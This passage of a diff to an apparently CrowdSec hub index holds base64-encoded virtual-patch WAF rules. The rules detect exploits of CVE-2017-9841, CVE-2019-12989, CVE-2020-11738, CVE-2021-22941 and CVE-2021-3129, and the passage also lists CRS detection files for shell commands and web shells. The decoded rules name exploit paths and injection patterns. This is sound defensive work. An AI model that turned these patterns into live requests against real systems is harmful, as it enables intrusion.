3dhZi9jcnMvUkVRVUVTVC05NDItQVBQTElDQVRJT04tQVRUQUNLLVNRTEkuY29uZgogICAgZGVzdF9maWxlOiBSRVFVRVNULTk0Mi1BUFBMSUNBVElPTi1BVFRBQ0stU1FMSS5jb25mCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9SRVFVRVNULTk0My1BUFBMSUNBVElPTi1BVFRBQ0stU0VTU0lPTi1GSVhBVElPTi5jb25mCiAgICBkZXN0X2ZpbGU6IFJFUVVFU1QtOTQzLUFQUExJQ0FUSU9OLUFUVEFDSy1TRVNTSU9OLUZJWEFUSU9OLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFUVVFU1QtOTQ0LUFQUExJQ0FUSU9OLUFUVEFDSy1KQVZBLmNvbmYKICAgIGRlc3RfZmlsZTogUkVRVUVTVC05NDQtQVBQTElDQVRJT04tQVRUQUNLLUpBVkEuY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVRVUVTVC05NDktQkxPQ0tJTkctRVZBTFVBVElPTi5jb25mCiAgICBkZXN0X2ZpbGU6IFJFUVVFU1QtOTQ5LUJMT0NLSU5HLUVWQUxVQVRJT04uY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVTUE9OU0UtOTUwLURBVEEtTEVBS0FHRVMuY29uZgogICAgZGVzdF9maWxlOiBSRVNQT05TRS05NTAtREFUQS1MRUFLQUdFUy5jb25mCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9SRVNQT05TRS05NTEtREFUQS1MRUFLQUdFUy1TUUwuY29uZgogICAgZGVzdF9maWxlOiBSRVNQT05TRS05NTEtREFUQS1MRUFLQUdFUy1TUUwuY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVTUE9OU0UtOTUyLURBVEEtTEVBS0FHRVMtSkFWQS5jb25mCiAgICBkZXN0X2ZpbGU6IFJFU1BPTlNFLTk1Mi1EQVRBLUxFQUtBR0VTLUpBVkEuY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVTUE9OU0UtOTUzLURBVEEtTEVBS0FHRVMtUEhQLmNvbmYKICAgIGRlc3RfZmlsZTogUkVTUE9OU0UtOTUzLURBVEEtTEVBS0FHRVMtUEhQLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFU1BPTlNFLTk1NC1EQVRBLUxFQUtBR0VTLUlJUy5jb25mCiAgICBkZXN0X2ZpbGU6IFJFU1BPTlNFLTk1NC1EQVRBLUxFQUtBR0VTLUlJUy5jb25mCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9SRVNQT05TRS05NTUtV0VCLVNIRUxMUy5jb25mCiAgICBkZXN0X2ZpbGU6IFJFU1BPTlNFLTk1NS1XRUItU0hFTExTLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL1JFU1BPTlNFLTk1OS1CTE9DS0lORy1FVkFMVUFUSU9OLmNvbmYKICAgIGRlc3RfZmlsZTogUkVTUE9OU0UtOTU5LUJMT0NLSU5HLUVWQUxVQVRJT04uY29uZgogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvUkVTUE9OU0UtOTgwLUNPUlJFTEFUSU9OLmNvbmYKICAgIGRlc3RfZmlsZTogUkVTUE9OU0UtOTgwLUNPUlJFTEFUSU9OLmNvbmYKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL2NyYXdsZXJzLXVzZXItYWdlbnRzLmRhdGEKICAgIGRlc3RfZmlsZTogY3Jhd2xlcnMtdXNlci1hZ2VudHMuZGF0YQogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvaWlzLWVycm9ycy5kYXRhCiAgICBkZXN0X2ZpbGU6IGlpcy1lcnJvcnMuZGF0YQogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvamF2YS1jbGFzc2VzLmRhdGEKICAgIGRlc3RfZmlsZTogamF2YS1jbGFzc2VzLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL2phdmEtY29kZS1sZWFrYWdlcy5kYXRhCiAgICBkZXN0X2ZpbGU6IGphdmEtY29kZS1sZWFrYWdlcy5kYXRhCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9qYXZhLWVycm9ycy5kYXRhCiAgICBkZXN0X2ZpbGU6IGphdmEtZXJyb3JzLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL2xmaS1vcy1maWxlcy5kYXRhCiAgICBkZXN0X2ZpbGU6IGxmaS1vcy1maWxlcy5kYXRhCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9waHAtY29uZmlnLWRpcmVjdGl2ZXMuZGF0YQogICAgZGVzdF9maWxlOiBwaHAtY29uZmlnLWRpcmVjdGl2ZXMuZGF0YQogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvcGhwLWVycm9ycy5kYXRhCiAgICBkZXN0X2ZpbGU6IHBocC1lcnJvcnMuZGF0YQogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvcGhwLWVycm9ycy1wbDIuZGF0YQogICAgZGVzdF9maWxlOiBwaHAtZXJyb3JzLXBsMi5kYXRhCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9waHAtZnVuY3Rpb24tbmFtZXMtOTMzMTUwLmRhdGEKICAgIGRlc3RfZmlsZTogcGhwLWZ1bmN0aW9uLW5hbWVzLTkzMzE1MC5kYXRhCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9waHAtZnVuY3Rpb24tbmFtZXMtOTMzMTUxLmRhdGEKICAgIGRlc3RfZmlsZTogcGhwLWZ1bmN0aW9uLW5hbWVzLTkzMzE1MS5kYXRhCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9waHAtdmFyaWFibGVzLmRhdGEKICAgIGRlc3RfZmlsZTogcGhwLXZhcmlhYmxlcy5kYXRhCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9yZXN0cmljdGVkLWZpbGVzLmRhdGEKICAgIGRlc3RfZmlsZTogcmVzdHJpY3RlZC1maWxlcy5kYXRhCiAgICB0eXBlOiBtb2RzZWMKICAtIHNvdXJjZV91cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jcm93ZHNlY3VyaXR5L3NlYy1saXN0cy93YWYtcnVsZXMvd2FmL2Nycy9yZXN0cmljdGVkLXVwbG9hZC5kYXRhCiAgICBkZXN0X2ZpbGU6IHJlc3RyaWN0ZWQtdXBsb2FkLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL3NjYW5uZXJzLWhlYWRlcnMuZGF0YQogICAgZGVzdF9maWxlOiBzY2FubmVycy1oZWFkZXJzLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL3NjYW5uZXJzLXVybHMuZGF0YQogICAgZGVzdF9maWxlOiBzY2FubmVycy11cmxzLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL3NjYW5uZXJzLXVzZXItYWdlbnRzLmRhdGEKICAgIGRlc3RfZmlsZTogc2Nhbm5lcnMtdXNlci1hZ2VudHMuZGF0YQogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvc2NyaXB0aW5nLXVzZXItYWdlbnRzLmRhdGEKICAgIGRlc3RfZmlsZTogc2NyaXB0aW5nLXVzZXItYWdlbnRzLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL3NxbC1lcnJvcnMuZGF0YQogICAgZGVzdF9maWxlOiBzcWwtZXJyb3JzLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL3NzcmYuZGF0YQogICAgZGVzdF9maWxlOiBzc3JmLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL3VuaXgtc2hlbGwuZGF0YQogICAgZGVzdF9maWxlOiB1bml4LXNoZWxsLmRhdGEKICAgIHR5cGU6IG1vZHNlYwogIC0gc291cmNlX3VybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Nyb3dkc2VjdXJpdHkvc2VjLWxpc3RzL3dhZi1ydWxlcy93YWYvY3JzL3dlYi1zaGVsbHMtcGhwLmRhdGEKICAgIGRlc3RfZmlsZTogd2ViLXNoZWxscy1waHAuZGF0YQogICAgdHlwZTogbW9kc2VjCiAgLSBzb3VyY2VfdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vY3Jvd2RzZWN1cml0eS9zZWMtbGlzdHMvd2FmLXJ1bGVzL3dhZi9jcnMvd2luZG93cy1wb3dlcnNoZWxsLWNvbW1hbmRzLmRhdGEKICAgIGRlc3RfZmlsZTogd2luZG93cy1wb3dlcnNoZWxsLWNvbW1hbmRzLmRhdGEKICAgIHR5cGU6IG1vZHNlYw==",
+   "author": "crowdsecurity",
+   "labels": null
+  },
+  "crowdsecurity/vpatch-CVE-2017-9841": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "0737417a66c5327708f6eff4392a4461002592fabcda6cdbdaa4143bce185503",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "6e5549b580c3a35315a6660a2904eafd3b463141d95f1ad2d5d606d55eb0b046",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTctOTg0MQpkZXNjcmlwdGlvbjogIkRldGVjdCBDVkUtMjAxNy05ODQxIGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC91dGlsL3BocC9ldmFsLXN0ZGluLnBocApsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJQSFBVbml0IFJDRSAoQ1ZFLTIwMTctOTg0MSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDE3LTk4NDEKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTk0",
+   "description": "Detect CVE-2017-9841 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2017-9841",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-94"
+    ],
+    "confidence": 3,
+    "label": "PHPUnit RCE (CVE-2017-9841)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2019-12989": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "a2f681cb8b762e33a66e63343a9fce32d5416438322ec376946ff78428543714",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "a8137b302f6fa55456dcf9cb7e9e9ba11dd878f0b91c90b3910fa4af397e0218",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTktMTI5ODkKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMTktMTI5ODkgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9zZHdhbi9uaXRyby92MS9jb25maWcvZ2V0X3BhY2thZ2VfZmlsZQogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgIC0gYWN0aW9uCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICJmaWxlX2Rvd25sb2FkIgogICAgLSB6b25lczoKICAgICAgLSBCT0RZX0FSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgLSBqc29uLmdldF9wYWNrYWdlX2ZpbGUuc2l0ZV9uYW1lCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGxpYmluamVjdGlvblNRTApsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJjaXRyaXggU1FMaSAoQ1ZFLTIwMTktMTI5ODkpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAxOS0xMjk4OQogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtODk=",
+   "description": "Detect CVE-2019-12989 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2019-12989",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-89"
+    ],
+    "confidence": 3,
+    "label": "citrix SQLi (CVE-2019-12989)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2020-11738": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml",
+   "version": "0.4",
+   "versions": {
+    "0.1": {
+     "digest": "4760198ce14851e3387470bc0270f662b58aa32b8ef1f4217af6818e4f0cedbe",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "d939fd479841838064eb205911dd20f35a8070eea2734cf4e0c7bd0c2b5444fe",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "d82023967b6e1516519bf0adf7ae5e4d192c19039434267cffd73058f550c2fc",
+     "deprecated": false
+    },
+    "0.4": {
+     "digest": "e73f8dadfeb909e98e3609d0cc098533f2c0351503cabebdf92a43f9d1b3e94c",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjAtMTE3MzgKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjAtMTE3MzggZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3dwLWFkbWluL2FkbWluLWFqYXgucGhwCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgIC0gYWN0aW9uCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBkdXBsaWNhdG9yX2Rvd25sb2FkCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgIC0gZmlsZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBjb250YWlucwogICAgICAgIHZhbHVlOiAiLi4iCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIldvcmRwcmVzcyBTbmFwIENyZWVrIER1cGxpY2F0b3IgKENWRS0yMDIwLTExNzM4KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjAtMTE3MzgKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTIy",
+   "description": "Detect CVE-2020-11738 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2020-11738",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-22"
+    ],
+    "confidence": 3,
+    "label": "Wordpress Snap Creek Duplicator (CVE-2020-11738)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2021-22941": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "994975ada2914e56168b94db4acb5f28293673fcf824d35619d5e35539cf8052",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "0057a096e2d27ce5264d9481dd073bf97d7ef9a6b7e3e11785cfd8dde880db56",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMjI5NDEKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjEtMjI5NDEgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC91cGxvYWQuYXNweAogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgIC0gdXBsb2FkaWQKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogIi4uIgpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJDaXRyaXggUkNFIChDVkUtMjAyMS0yMjk0MSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIxLTIyOTQxCiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS0yODQ=",
+   "description": "Detect CVE-2021-22941 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2021-22941",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-284"
+    ],
+    "confidence": 3,
+    "label": "Citrix RCE (CVE-2021-22941)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2021-3129": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "78803a49055ed71b353ddf43560d700d0b64ebfb172ef6705457f793a9f37b34",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "b155e9bbe64b4b44f3c98617c4b3bfedaadcce147e0685290e0d7a8dbdf47108",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQpkZXNjcmlwdGlvbjogIkRldGVjdCBDVkUtMjAyMS0zMTI5IGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9faWduaXRpb24vZXhlY3V0ZS1zb2x1dGlvbgogICAgLSB6b25lczoKICAgICAgLSBCT0RZX0FSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAtIGpzb24ucGFyYW1ldGVycy52aWV3RmlsZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAicGhwOi8vZmlsdGVyfHBoYXI6Ly8iCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIkxhcmF2ZWwgd2l0aCBJZ25pdGlvbiA8PSB2OC40LjIgRGVidWcgTW9kZSAtIFJlbW90ZSBDb2RlIEV4ZWN1dGlvbiAoQ1ZFLTIwMjEtMzEyOSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIxLTMxMjkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTk4",
+   "description": "Detect CVE-2021-3129 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2021-3129",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-98"
+    ],
+    "confidence": 3,
+    "label": "Laravel with Ignition \u003c= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2022-27926": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "d96237a7ed02eb7aa9df45a684b5cef8f5145e857d10b5260373739668ad63f5",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "ba56077560152e4dd0e06c1bc1e6522515142b0ea7a27dff2c0ea289ddaee174",
+     "deprecated": false
+    }
+   },
